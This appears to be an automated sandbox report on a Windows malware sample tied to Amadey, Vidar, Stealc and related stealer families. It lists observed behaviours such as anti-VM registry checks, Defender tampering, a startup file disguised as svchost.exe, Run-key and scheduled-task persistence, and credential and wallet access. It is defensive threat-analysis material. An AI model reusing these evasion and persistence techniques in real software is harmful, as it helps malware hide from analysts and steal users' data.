Malware Analysis Report

2025-04-03 09:22

Sample ID 250306-f2tqwszqv3
Target 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a
SHA256 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a
Tags
amadey stealc systembc vidar 092155 ir7am traff1 credential_access defense_evasion discovery execution persistence spyware stealer trojan gcleaner healer trump dropper evasion loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a

Threat Level: Known bad

The file 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a was found to be: Known bad.

Malicious Activity Summary

amadey stealc systembc vidar 092155 ir7am traff1 credential_access defense_evasion discovery execution persistence spyware stealer trojan gcleaner healer trump dropper evasion loader

Healer

Gcleaner family

Modifies Windows Defender notification settings

Systembc family

Vidar

Modifies Windows Defender TamperProtection settings

GCleaner

Amadey family

Detect Vidar Stealer

SystemBC

Healer family

Stealc family

Amadey

Detects Healer, an antivirus disabler dropper

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender Real-time Protection settings

Stealc

Vidar family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Checks BIOS information in registry

.NET Reactor protector

Loads dropped DLL

Unsecured Credentials: Credentials In Files

Identifies Wine through registry keys

Reads user/profile data of local email clients

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Windows security modification

Checks computer location settings

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Windows directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

Program crash

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Modifies registry class

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 05:22

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 05:22

Reported

2025-03-06 05:25

Platform

win7-20250207-en

Max time kernel

89s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\dmax\rqrt.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\dmax\rqrt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\dmax\rqrt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe N/A
N/A N/A C:\ProgramData\dmax\rqrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\ProgramData\dmax\rqrt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\65198a42c7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110390101\\65198a42c7.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\dmax\rqrt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
